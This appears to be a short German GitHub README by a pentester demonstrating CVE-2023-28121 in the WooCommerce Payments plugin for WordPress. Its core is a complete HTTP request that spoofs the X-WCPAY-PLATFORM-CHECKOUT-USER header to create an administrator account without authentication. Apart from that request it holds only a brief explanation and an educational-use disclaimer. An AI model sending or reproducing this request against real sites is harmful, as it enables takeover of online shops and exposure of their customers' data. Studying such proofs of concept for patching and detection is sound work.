
Praktische Ausnutzung einer kritischen Schwachstelle in WordPress mithilfe des Plugins WooCommerce Payments.
Praktische Ausnutzung einer kritischen Schwachstelle in WordPress mithilfe des Plugins WooCommerce Payments.
Die CVE-2023-28121 ermöglicht die Erstellung von Administrator-Benutzern ohne Authentifizierung über die REST API.
📊 Das betroffene Plugin hat Hunderttausende Installationen und wird häufig im E-Commerce eingesetzt.
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
Das System akzeptiert einen manipulierbaren Header:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
Dadurch ist es möglich, eine Anfrage zur Erstellung eines Benutzers mit erweiterten Rechten ohne gültige Authentifizierung zu senden.
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ Ergebnis: Erstellung eines Admin-Benutzers
/wp-admin👨💻 Autor
Luis Eduardo .M.B.S.R
Pentester / Web Security
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
Verwendung zu Bildungszwecken in kontrollierter Umgebung. Ich übernehme keine Verantwortung dafür, wie dieses Wissen von Dritten verwendet wird.